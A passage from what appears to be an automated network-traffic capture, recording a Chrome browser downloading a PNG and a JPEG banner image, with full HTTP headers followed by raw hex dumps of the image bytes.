                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:59 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:59 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 69232
                                                      Connection: close
                                                      Last-Modified: Mon, 26 Feb 2024 14:45:48 GMT
                                                      ETag: "65dca41c-10e70"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:59 UTC3739INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 bc 00 00 01 cc 08 03 00 00 00 00 ae 8b 2d 00 00 03 00 50 4c 54 45 ff ff ff f8 fb f0 fa fc f4 f4 fa e8 f0 f7 e3 ee f6 df f6 fb ed f4 fa eb 01 98 6f f2 f8 e5 eb f4 d8 ed f5 dc e2 f0 c9 fb fe f7 d3 e6 ad e9 f3 d6 dc ec be d9 ea b8 e4 f0 cb d7 e8 b3 e4 f0 ce e1 ef c5 e8 f3 d3 f2 fa e3 df ed c3 03 a9 ae 40 be b3 68 cd b6 e6 f1 d0 f6 fa eb f0 f9 e0 d5 e7 af f0 f8 dc 00 a8 85 5a c8 b5 e0 f0 c1 dd ef ba df ef bd dc ee b7 e6 f2 cf da ec b4 e3 20 22 14 af b0 f7 fc ec 30 b9 b2 e8 f3 d1 d1 e8 e1 20 b3 b1 00 00 00 4d c3 b4 ed f7 d9 aa d4 c6 d8 ef ec aa da cf f5 fa fa 6e b8 9e 69 c1 ab ad ad ad b7 e2 de d0 d0 d0 c2 e7 df 6b 6b 6b ea f5 f4 ff db 4e 00 a9 ef ab d9 dd ff f1 83 ff db 70 41 cc 48 de f2 ef ff ca 5d d2
                                                      Data Ascii: PNGIHDR-PLTEo@hZ "0 MnikkkNpAH]
                                                      2025-01-12 23:47:59 UTC4096INData Raw: 76 8d 10 79 a9 38 2a af 2d 9b a3 a5 b5 b1 b9 a0 51 01 fd a1 da f0 9b 5d 7c 58 d3 2c b2 8a 2d 39 76 71 18 de 9f 1c 2a e8 b4 79 52 2f 9a c4 ad 22 8b a8 0b bb 8a ae 51 38 f5 32 be 5a 6f f0 5e 3f 12 76 5e 17 5e 0d bd 45 a1 45 5e d0 77 c1 d8 90 9f 85 4c d9 05 ba 52 6a a0 2b 9e c2 b5 86 42 1b 36 38 2f 36 6c a5 fc 01 4c 4b 72 b5 11 15 50 bd 1a 84 d7 b5 5e fd 10 74 5e 58 b5 aa 5c 6c 15 eb bc ce 0b e3 a5 11 07 7b a2 0d 42 70 50 89 f1 16 5b 44 4b e1 55 7c f5 4f 55 bc 89 a6 7a 43 1d 62 12 e8 25 7e 3d 83 65 ff 6b c3 a6 89 81 47 21 b7 6b 31 70 0b 6f d7 a4 d2 40 57 8d d0 3c a4 f8 83 fc 3e 2f 42 77 de 77 91 77 01 ee fc 58 4b 7b 43 54 40 eb b7 2c 38 56 81 d8 40 0e 0c b8 5d 7a e5 55 70 15 35 6e 14 87 e8 45 97 98 47 1c e4 01 bb 6e f6 ef 9c bb fb f6 ed db bb 37 e5 7d f7 c1
                                                      Data Ascii: vy8*-Q]|X,-9vq*yR/"Q82Zo^?v^^EE^wLRj+B68/6lLKrP^t^X\l{BpP[DKU|OUzCb%~=ekG!k1po@W<>/BwwwXK{CT@,8V@]zUp5nEGn7}
                                                      2025-01-12 23:47:59 UTC4096INData Raw: e7 62 46 ff 98 30 93 09 07 08 32 0e 14 0b c3 0b 13 fe d1 f5 4a ed ad 9d 70 85 5a 86 d7 df 37 c3 87 4f a9 a8 db 87 ff d3 d4 ab 3c 7e c1 a8 2f 75 42 9a 6f a0 ef 04 0a a9 bb ac bc 35 70 2d d7 20 3d 2f b2 cb 21 c7 ed 71 30 cc d5 10 a8 16 f0 b2 6d 20 88 90 5e 73 79 4f 64 0d a7 7b 11 5e 16 5e 4a 32 d0 be 09 78 0b f4 8e a9 d4 46 fd e9 e4 79 f1 32 e2 1b ae 55 cc 6b 89 92 5e 13 ec 1c 0c bc 87 0e 1f 3e 08 bf 5c e8 df 52 27 ee 1f 53 c7 fa fd a3 b7 14 c4 b1 ef 90 24 bb f1 fd 1a a4 1c 5e 3e 45 78 31 04 bc 9b b8 bb 6c 0e 70 58 7a e5 b4 74 d9 5c 16 9a 41 d2 3e dd a0 42 8e d7 e4 78 89 5b 12 de 60 23 af 10 5e 93 24 5b 1b 6a ca b1 5a 1b 58 7e f1 ee 80 67 d0 02 2c fc ae b4 10 ad e1 35 0c d9 ed bd 8b 6f 6f 9b c3 8b b5 e1 54 31 bd da 02 17 b8 23 be ac f6 05 71 91 22 32 67 17
                                                      Data Ascii: bF02JpZ7O<~/uBo5p- =/!q0m ^syOd{^^J2xFy2Uk^>\R'S$^>Ex1lpXzt\A>Bx[`#^$[jZX~g,5ooT1#q"2g
                                                      2025-01-12 23:48:00 UTC4096INData Raw: ec 4e 2e c8 a6 d2 de ce d4 3e 36 71 75 b9 41 97 1c 9e a4 d7 34 05 de af 9f 81 2f 66 6a d0 ec ca d4 7a d7 83 21 f5 e4 90 62 5a 75 d9 69 74 b6 cf 1e b0 54 10 a7 39 36 1e f9 27 09 53 79 f6 f0 72 3a 18 89 bc 63 6a 6d 24 6b 37 22 1f 98 1a 3b fe 1d de 66 90 ef bf 09 06 26 e7 41 0c 86 f4 df b9 86 60 81 31 05 b7 07 1a 52 64 10 de d9 5a 4f bb 3d 88 23 3d 9d 59 16 73 0b 6f 1b e3 df e0 25 ca 35 10 c0 cb 86 68 c0 ad a5 2d b7 2c 54 84 d7 da 9d bc 3d 89 e2 c6 05 c6 d1 ba bf c2 2b 83 73 ba ac 37 5d b0 ad ee cf 06 7f 51 70 b8 dc 51 a1 f7 12 27 87 af f2 83 ed fe 0c 83 e6 17 69 67 93 eb 34 0c 45 61 a7 69 13 85 60 3d f1 cf 04 89 01 82 11 19 20 35 62 80 de 1a ba 02 66 48 88 05 54 6c a4 fb c5 d7 c7 ee 89 7d ed 24 c0 49 5f 9e db b4 4d 21 5f cf bb be fe c3 e7 88 dd 71 5e 32 6a
                                                      Data Ascii: N.>6quA4/fjz!bZuitT96'Syr:cjm$k7";f&A`1RdZO=#=Yso%5h-,T=+s7]QpQ'ig4Eai`= 5bfHTl}$I_M!_q^2j
                                                      2025-01-12 23:48:00 UTC4096INData Raw: f1 f5 7f a3 35 31 29 e4 06 cf 5d 2e 51 20 1a de ca 33 6a 78 ff c7 e1 85 2b 30 15 5e 08 35 28 31 16 b5 75 7b 55 23 c7 4d f0 66 ff 00 de e1 9b e4 d2 4d d9 5b dd a8 b7 62 13 b9 bd 7a 88 03 c4 b6 de 37 aa be 76 23 bc ac b1 69 76 59 69 03 bf 46 81 db 3f 2e bc 71 3e 03 d9 55 13 f2 9e 6b d0 9d 95 0f 6f de 07 1a 93 ff 15 78 5f 98 d4 c7 44 35 5d a0 de d8 aa 8b cc e1 f2 e2 2a ff af e5 3d 8c 36 36 80 59 b7 50 a8 d4 8c d2 eb 4d fe f4 2a 4a 54 6b 6e 87 97 fc 6a a7 d7 b5 9a 25 e0 e5 10 5e 35 9c 4c cd 92 73 27 45 5d f7 da d3 bb a9 a9 43 f9 37 e0 5d d0 e5 8d 65 76 63 19 4a 78 e7 a4 fc f7 c1 9b fd 5e 78 eb ba 65 b4 a3 8c 6f 6b af 4f 68 b0 b1 81 f2 d8 c5 8a c2 66 a5 8d ec 72 0e 12 3b f3 de 5d 94 eb fb db e1 a5 df a0 1f a7 08 3b db 8c 9e 1e e7 8b b0 7b a9 b6 46 74 9d bf f4
                                                      Data Ascii: 51)].Q 3jx+0^5(1u{U#MfM[bz7v#ivYiF?.q>Ukox_D5]*=66YPM*JTknj%^5Ls'E]C7]evcJx^xeokOhfr;];{Ft
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 6b be 27 cb 4a 1b 77 85 91 e9 01 c4 b8 21 85 05 8c f7 30 78 17 ee fc 0a ad 1a 7c 68 bb e2 f7 f8 f0 96 38 9f f0 e1 95 db c4 9b a5 d4 16 8f 4c 0a d4 c7 a0 e9 a5 34 bd bb a7 ad c4 e0 f5 4b 37 57 f0 96 fe 7b df 76 d1 d5 bf ab d0 f4 3e fc fd 77 ed bd d5 5f 46 72 45 ca 75 dd 1b e4 f4 2d bb 7d 8c b8 5d c8 7a bd 76 78 d8 ae 2b 6d 42 e3 35 e7 4a f3 c0 1f 50 33 c7 82 d7 80 19 92 e1 3c a9 d0 28 c7 21 0d 85 47 59 09 bb d5 df 41 f0 da 92 d3 dd 04 da f4 45 b6 fc ff 80 17 8f fc 0c 32 87 5b 69 6a 09 bb bd 38 bc 38 f0 94 7a 3e 66 23 bc 59 1b 78 cf 54 3b 2f 5e 53 6d bd 8f 60 17 f0 ea 68 97 ad 64 ea e2 84 91 fc 33 93 19 74 53 65 e5 3d 19 51 47 59 c1 f9 1b 63 bc fd 31 97 9a 71 5e 37 36 88 00 2f 96 c7 07 3b 26 5e 00 ef c0 c2 eb 24 c3 db 3a 40 43 7c 86 b8 47 33 4c a6 f5 13 e2
                                                      Data Ascii: k'Jw!0x|h8L4K7W{v>w_FrEu-}]zvx+mB5JP3<(!GYAE2[ij88z>f#YxT;/^Sm`hd3tSe=QGYc1q^76/;&^$:@C|G3L
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 4b 78 f3 f4 92 5d a6 5e 0c d9 e8 bc 22 6f bb a0 f5 c5 cb 17 22 29 22 eb 05 bb a0 f7 74 18 7c ab cc 8c 6e d9 79 09 74 ec b8 06 65 f0 0b 34 e8 bc 6b b6 0b 36 41 2c 82 02 fe 23 bd 14 a8 ca 06 74 0f a9 2c bc d0 0e ec 4a b9 55 6e cd 6c 19 e1 25 b9 eb ce 5b b6 de 93 06 de 50 84 f7 32 e9 cd 4e e7 a2 f0 59 17 e6 8b 46 24 e1 cd 99 95 f1 da 0c 62 48 68 24 10 8b 8a b7 e8 44 2b 27 98 31 39 e4 e1 dd ed 02 76 c9 2f ad 17 f4 86 ce 4b 76 5f 84 0a cd 17 1f 31 62 e9 ad 72 d7 07 d3 76 ad f3 b6 a5 43 15 0c bd 5a 81 e8 bc 99 09 b2 22 bd db a5 ea 85 94 4b d7 25 b8 19 78 2f 2a bc f0 e0 89 db f2 6c 99 39 34 6e 26 07 01 ad 07 38 65 b7 0f 43 c3 1a bc 54 c3 51 db 35 e2 9b c9 bc a2 7b 0d c0 d5 6d 28 c3 3b 0c 7e 9c 36 1b 2c ea 79 e1 3b b8 89 5b 81 97 b6 6b 4e d2 21 bc cb 8c c3 4e 16
                                                      Data Ascii: Kx]^"o")"t|nyte4k6A,#t,JUnl%[P2NYF$bHh$D+'19v/Kv_1brvCZ"K%x/*l94n&8eCTQ5{m(;~6,y;[kN!N
                                                      2025-01-12 23:48:00 UTC4096INData Raw: ea be 0d 0c af 76 36 78 e7 07 ea 2b f7 e9 14 3d 31 a6 d4 ad 2b b3 69 f5 03 25 d8 b0 11 95 09 74 5b 29 e2 30 f0 95 46 95 0e 4d f5 b5 ab 9c b3 a1 33 11 64 b4 63 6e 0c 26 4c 0f 57 16 2e 0a bf 0e 27 5e 0d c8 c4 4b a9 b1 4a 92 23 ef d4 14 41 2c 85 d2 e1 d6 3a 68 77 e0 ad c7 42 9a 68 54 ff 1f c2 ab 42 7b cd 9d 36 12 fc 2a bb bb e4 de 76 17 0c 0a bb 80 f7 26 c1 7b e3 c6 03 6a ad 11 bb 24 72 de ef ac f3 72 67 03 8c 77 ea bc cf 47 58 e9 9d 65 df 85 4b bb d3 cc ab 9d 65 a2 58 d6 67 c1 bb bb 8b f8 89 f0 78 26 fe 33 d0 42 75 2b ed 52 e1 95 48 a8 3b 3d 9d 26 be 32 e7 0a 2f 76 2a 31 44 6f ed e0 1d d0 8f 1a 58 79 e7 07 6a ed a7 d3 8e 9d 23 ac c8 cd b8 76 a1 d9 3e 5c 77 43 c5 dd 04 59 46 71 75 8d ef 4a 44 f0 a6 fe d2 48 8e 8d 0b d6 65 0d 43 67 56 a4 6a 95 95 02 4f 85 09
                                                      Data Ascii: v6x+=1+i%t[)0FM3dcn&LW.'^KJ#A,:hwBhTB{6*v&{j$rrgwGXeKeXgx&3Bu+RH;=&2/v*1DoXyj#v>\wCYFquJDHeCgVjO
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 1b a0 58 37 06 78 81 ef a1 3b 83 80 f7 af cf 02 f0 7e 1f 02 ef 1f 58 e7 35 c1 3b b1 fc dd 60 78 be 5b 9e 07 bc 9c 6e 8d 5e 33 bc 60 f8 b1 60 eb c5 8a 78 10 de 35 12 6f 4a e0 ad 42 bc 14 7d c6 26 ec 0e 17 1a b1 44 47 5f 71 d2 61 b7 ea 2b 0e 22 5e 29 bc e8 bb 14 de 0a bc ce 8f 84 e1 04 c0 46 54 e0 4b d4 77 53 c3 23 6e 67 10 76 39 cc 6e 7e b6 92 af a4 60 5e 7a 71 0a e7 ec 2c c1 9b a9 1f d7 e9 c5 db 5e cf bc 47 15 f5 1a e0 7d e2 b0 5c 45 de 4f 79 d7 3d 82 26 2c eb 39 a5 c0 ab 1f a2 08 6a f6 46 32 99 fc 41 91 2f 81 1b 38 b3 e1 b6 87 ee ed 7b d7 ce 5e bb 76 ef a2 8a ef 6d b5 f4 0e 4c 20 5f fc 19 34 2f 90 45 de d3 6a 83 5a 1a 36 96 fd b8 72 fc f4 ae f8 e0 3d 9c e8 4e 80 d5 40 ff 05 d3 b2 4c ac 9f 5c a6 2d f7 fb 23 ec 5a 34 5b 1b 56 c4 ab e3 2b f4 ca 64 2d 91 e8
                                                      Data Ascii: X7x;~X5;`x[n^3``x5oJB}&DG_qa+"^)FTKwS#ngv9n~`^zq,^G}\EOy=&,9jF2A/8{^vmL _4/EjZ6r=N@L\-#Z4[V+d-
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 80 ae 66 77 04 ec 8e 48 de 15 7a f1 20 bd 74 3d b3 6b b9 6f 18 5e 46 95 06 01 97 ea d3 32 85 83 42 6d 67 b3 68 b4 7c 36 7b af f1 5d a6 b7 5c b6 4b 0d 25 7a 96 3c 2f 37 3a f1 6d 56 e0 2d 6b 78 47 01 af 0e ba 00 d6 1c 9c 7c a5 de 10 cd ae 15 1b fa 7a 6d b9 26 f3 8a 22 32 af ed bb 04 ef 49 6e 3f e7 cc 10 03 bb 7f 23 ec 4e ef bb ca 57 24 bc 08 be fe b9 f1 7d 1a e4 1a df dd c3 db 80 57 52 ef e4 7c 70 d3 bb 81 57 c5 be 79 57 bd bb aa fa 7b 4f 3f e8 3c ae 92 58 9f 70 b7 c9 78 75 57 4e 5b f0 c6 2b eb 7a 4d 98 eb 0e 15 c0 4c 6b 21 95 f9 23 e0 8d 9a b0 89 1f db a1 d7 86 17 c6 4b a9 01 f0 d2 7f 71 90 9b 20 df 65 74 9f 1d e6 23 43 f2 98 dd 11 66 d7 52 06 07 d8 bd 0e e5 53 d0 4a 4f 01 f8 22 3b 36 e8 15 14 4d ad 26 16 97 7a 94 8f 28 57 d2 04 41 dd 90 cf 66 83 c6 0b 8d
                                                      Data Ascii: fwHz t=ko^F2Bmgh|6{]\K%z</7:mV-kxG|zm&"2In?#NW$}WR|pWyW{O?<XpxuWN[+zMLk!#Kq et#CfRSJO";6M&z(WAf


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      114192.168.2.44986520.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:59 UTC386OUTGET /images_plus/other/banner4.jpg?ver=1606891699 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:59 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:59 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 47441
                                                      Connection: close
                                                      Last-Modified: Wed, 02 Dec 2020 06:48:19 GMT
                                                      ETag: "5fc738b3-b951"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:59 UTC3739INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c2 00 11 08 00 ff 02 bc 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 00 01 03 05 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 08 04 05 06 07 09 01 0a ff c4 00 1d 01 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 03 02 04 05 06 07 08 01 09 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f9
                                                      Data Ascii: JFIFCC
                                                      2025-01-12 23:47:59 UTC4096INData Raw: 53 75 6d 8e ee d4 ba b6 d3 77 6d 8e ea da bb a0 8e ee 8e 39 a9 e3 9d b4 88 16 00 03 c6 c5 bb d5 7a 8f b1 f0 1e 7e ea 9e 9d 9a fc c3 dd 54 31 4f 53 25 90 5e e0 ce 6b 0d ab 81 c7 6d d7 cc d4 30 64 32 69 b0 b3 cf 67 f3 bf 3a f5 6f 4e d6 58 6c 13 47 9e fb 17 d8 f2 15 88 fc 7c 79 f7 30 83 2b 06 7a 4f 89 b1 5c b6 89 6d 83 26 a4 7d 09 da bc d5 0d b0 5d b7 5d 59 6d 81 e9 b0 f0 d7 92 c7 99 e7 77 26 85 3b 73 c1 a8 3a 05 8c 63 e8 58 6d 5d 9d b1 a6 4f 4f 1d 69 4c e2 1e 8b ed 9e 61 e4 be b5 e8 dc 0a d3 63 48 00 81 02 40 00 00 00 50 f2 35 be d5 49 6f 57 24 35 2b 7a f9 2d ab 16 f5 95 41 bf f2 1a 0e b8 b5 d9 b6 35 d6 b5 5f 5d be 0f 69 b0 6c ab fd 5a 34 e2 3a 4d 15 37 34 89 e8 d3 50 47 3d 1c 77 14 c9 e9 e3 9b c4 8d 8e 00 0a 14 05 5d 70 75 c7 6e f2 a4 39 d6 3d 11 8a c3 9f
                                                      Data Ascii: Sumwm9z~T1OS%^km0d2ig:oNXlG|y0+zO\m&}]]Ymw&;s:cXm]OOiLacH@P5IoW$5+z-A5_]ilZ4:M74PG=w]pun9=
                                                      2025-01-12 23:47:59 UTC4096INData Raw: 24 6f 6b 77 ec 29 e9 67 cf 8b c2 48 a0 82 dd 0e e1 1c db 2e 9e 08 b2 0b 58 cd 30 b6 51 38 8c 4e d3 f3 4b dd 25 bd 61 2d b3 f0 ad 07 be c5 99 e4 8d f7 96 c2 fd ba 10 43 e4 3f 2b 19 1a e0 a1 6d b1 d0 42 d7 99 49 58 cd da 7f 26 3a 08 7e 89 9e ac 66 b4 99 36 f3 45 0b f9 ae 14 e6 a1 f2 ef 0d d1 bf 55 e3 7a 4d 5f b8 5c 0c 42 ff 00 e6 1c 7b 6b 59 50 b6 4f 2e ca ab 05 ca b5 e0 d4 00 6c 77 cd 71 9c 2c da e4 96 46 44 b0 ec bf ba b9 34 b5 41 c2 86 d8 68 8d ea 1f 70 8c a0 76 9c bc 22 0b 0a 43 53 35 63 3c 25 51 2d d1 2d 35 4b a1 9d 83 9b 82 3d fa 45 14 e1 d0 69 0b 67 cc d3 5e 0b 95 51 ca a5 65 0f b1 e6 4d 9a 0b ed 4f 15 1e b9 6b 65 8c b4 69 a5 88 7c a2 9a 90 f6 4c 70 3e 40 44 aa 83 10 73 93 52 a1 d4 d7 39 35 08 d1 c3 54 4b ca 0a 86 ed 2a 10 a2 5f 76 03 e2 73 78 d1 33
                                                      Data Ascii: $okw)gH.X0Q8NK%a-C?+mBIX&:~f6EUzM_\B{kYPO.lwq,FD4Ahpv"CS5c<%Q--5K=Eig^QeMOkei|Lp>@DsR95TK*_vsx3
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 12 7f 85 7a 99 ff 00 de b8 e8 3b 3b ea 28 6e 08 e9 7b 90 4b d0 1d 6f a3 7c 18 f1 82 89 48 c5 7d 09 a6 b3 6d 42 50 7e 5e 10 5c b7 d1 ac 24 c6 38 88 9a 5b 5e 67 7a 2b 04 e7 96 76 ed c6 18 e8 d9 41 57 e7 34 a4 92 fa 45 1b 70 23 f7 91 35 2d ba 4d de 3e 1f e1 dc 8a 1f f4 69 92 c9 c5 87 3f b5 1c b0 7c 4e b6 42 92 2a d0 08 db 52 4c 65 6f b4 db cb c9 a8 e5 12 62 4c 20 c7 40 35 d1 ec ee 0d f6 ad 07 b4 31 72 4a 4c 3e f6 59 c7 00 90 5a b9 1a e8 89 1e f2 b5 89 51 0b 28 24 84 e5 71 7f 26 18 55 af 1f 98 2b 65 3c 47 6c 9b af 37 9f 6e 55 2c 59 8e 98 4a cb 86 c8 f1 02 79 9f 99 52 b3 15 ae a2 d4 6a 2e 98 22 59 c7 28 3d 17 ce 5e 29 f5 91 6a f5 85 81 3f b4 84 be 93 9d 8e 42 02 72 95 58 16 ca 6d 64 84 a6 d7 fa 92 dd 46 41 b8 de 66 4f 8a 01 78 43 4f c5 7b ec 3f 2e 48 8e 73 9c
                                                      Data Ascii: z;;(n{Ko|H}mBP~^\$8[^gz+vAW4Ep#5-M>i?|NB*RLeobL @51rJL>YZQ($q&U+e<Gl7nU,YJyRj."Y(=^)j?BrXmdFAfOxCO{?.Hs
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 10 ad fc 43 79 97 8e 4c 40 ab a3 5e c2 e1 87 cf 66 95 89 fe 8f 0c e4 0e 2f 32 ec 86 bc 4f ca 82 85 74 69 f4 2e ab ff 00 42 10 9a 87 41 df cb df a6 b4 11 8e 2a 2a 66 8a 9c f5 d1 53 f4 59 43 5e 3d 68 ba ad 16 58 f5 fa 6a c7 5c 71 0e 49 3a a0 5a c7 eb 19 60 77 93 6b e6 25 a5 c6 d6 44 6b 2d 54 61 15 c7 cf 16 89 05 77 69 ce 2a 98 e2 56 bc 64 cc 32 18 0d c4 f0 d5 d8 6d 61 de 31 a3 99 64 9b 14 c2 81 a9 1a 3b 8a 88 46 06 9f 4d d8 e9 c6 59 42 f5 8e 5a 1d 66 df ef 50 ca 9e ba 1d 43 fd 7a 1c e5 18 39 42 19 ab c4 e6 ae 5f 8b e8 f4 69 da 84 74 44 b5 40 4f 85 f7 f0 4d ee 4b 20 b1 4d 66 29 30 37 31 c9 9d 8e 61 98 f8 38 40 5d 7a 2d d0 4b c1 f6 43 09 65 78 c3 9f c6 8b 5e 30 e7 f1 a2 d7 39 cf e2 c5 af 12 67 f8 b1 2b ac 4f 50 bd ad e1 fc 02 c1 63 55 17 0e 1c 9f 87 ea c8 bf
                                                      Data Ascii: CyL@^f/2Oti.BA**fSYC^=hXj\qI:Z`wk%Dk-Tawi*Vd2ma1d;FMYBZfPCz9B_itD@OMK Mf)071a8@]z-KCex^09g+OPcU
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 70 83 cf fe be 81 db 74 47 72 4c 33 59 fa 95 22 0e 2a 2d 98 9b 7f b8 c3 e2 34 82 be 4e 84 96 36 db e7 f2 c8 ab 0b f7 dd 9a db 91 46 6e 78 bc 28 5a 16 41 f0 08 ca 67 2f 3e 7c 73 c2 d5 e1 57 ff 00 b3 b2 f0 ea ef 6b 5a d5 d5 af af 5f d9 03 f7 f6 87 ef ed 0f d5 af 60 7e fe ce 2f 87 e9 74 69 41 07 da 1f be 82 0b d7 5d 1a 57 46 b4 10 7e ba f4 7d 81 05 5c 5f 0d 74 69 5c 75 c7 41 07 eb ae 8d 28 20 eb a3 5a 08 2a e8 d6 ba 35 af 0d fe f5 e1 bf de bc 3f fa 15 d1 ad 71 d5 e1 fa eb a3 4a e2 f8 6b 8e b8 eb 8e b8 be 1a e8 d7 b3 5a bc 3a e3 ab c3 ae 51 02 f6 23 57 8c 39 fc 68 b5 7f a5 d3 5f eb f6 5e 1d 5e 15 71 7c 35 ad 6b 57 d5 d5 af af 5f d8 c3 f7 fd 20 3e 87 17 c3 d8 10 74 1f bf e8 07 ef a0 82 f5 d0 7e ad 68 20 e8 20 bd 74 10 54 10 7e ba 08 3e c0 83 a0 ac f5 d0 41 fd
                                                      Data Ascii: ptGrL3Y"*-4N6Fnx(ZAg/>|sWkZ_`~/tiA]WF~}\_ti\uA( Z*5?qJkZ:Q#W9h_^^q|5kW_ >t~h tT~>A
                                                      2025-01-12 23:48:00 UTC4096INData Raw: a0 df 4f 67 0b 68 ac 1a 07 9c 58 b2 f4 46 24 ac 81 a2 d3 60 c7 6b 29 b0 43 cc d7 c2 bd 3b c5 44 4f 9f 1c c8 25 72 44 f4 02 69 2b c2 a4 05 61 4f 83 5c b3 0d 50 b3 d0 49 10 c6 23 55 73 b4 e9 10 18 59 20 fb a1 99 33 fe 36 b8 78 a4 cb c8 25 b3 bf af b9 06 ad 7c 64 69 21 9d 48 45 88 01 b1 6f 97 67 58 69 8c 43 d4 aa 8a 23 ce a4 70 7a 9c 49 42 db 6a 23 08 e6 33 79 f5 46 1b 27 46 93 82 06 aa 9c d8 2a 80 2c c5 f9 61 65 33 e2 72 a2 e9 4a 6a 96 1a 9f f3 a3 8e 2d bf a9 9d 7f 9a 80 53 b9 f4 df 79 ed bb 6f a5 18 c5 22 f8 bd 9d 92 ee 7e 5f 88 87 1a b3 87 19 52 41 20 cc a2 aa 16 c8 88 c3 3f 0c e7 06 85 5f aa 3e 3d 6f dd 8e c7 3f 3c 1a 9e 32 2f 65 d3 6f 35 bc 17 bd 04 b8 f7 60 b5 a6 42 d1 ba 9e 29 20 da a7 5e 0d 52 de 85 bc a4 15 39 cd 1a 52 e9 28 59 61 0f 81 82 75 a5 26
                                                      Data Ascii: OghXF$`k)C;DO%rDi+aO\PI#UsY 36x%|di!HEogXiC#pzIBj#3yF'F*,ae3rJj-Syo"~_RA ?_>=o?<2/eo5`B) ^R9R(Yau&
                                                      2025-01-12 23:48:00 UTC4096INData Raw: 55 9c a8 ae 12 4d 12 1d 65 54 53 64 60 92 c2 9b de f7 0e d5 3a cf c9 b1 4c 8a db 12 4f ce c2 ca d6 66 a6 73 cd ce 83 52 88 bc 8a f6 82 48 b6 d0 25 4e 23 a5 47 a3 96 31 72 04 7f fd ec 04 a5 8d 1f f8 34 a1 c2 78 4e 0c 11 48 eb 11 2a a9 cc 36 c7 f5 44 3f cb 87 6e 09 57 0a ef 95 a5 51 14 12 78 b2 5b a7 8b ef a9 91 ef 29 e4 92 86 19 25 72 56 19 5a b1 11 d5 11 1f ad 07 b7 d8 72 f5 16 e8 f3 8c c0 62 ec c9 1a 4b 5b 23 b2 9d 23 51 75 bb 38 b1 64 82 5c 1d 02 78 25 f5 63 14 fa fd 83 56 3d d1 12 37 53 25 93 c8 41 2b 48 e9 4d 3e 99 66 28 35 3b 97 93 b6 e9 1f 33 14 2a f6 60 a7 4a 82 3c d0 3c 31 f6 47 b9 fb 8e 57 da 74 d4 63 49 3e b7 c4 42 24 f8 4a ca a5 4e d5 13 14 28 4b 0c 04 54 a7 12 90 12 a4 46 aa 02 0d 5f 8d 84 e9 a1 fa aa 81 42 2e 4c 7d 53 3e c3 97 34 01 9e a8 08
                                                      Data Ascii: UMeTSd`:LOfsRH%N#G1r4xNH*6D?nWQx[)%rVZrbK[##Qu8d\x%cV=7S%A+HM>f(5;3*`J<<1GWtcI>B$JN(KTF_B.L}S>4
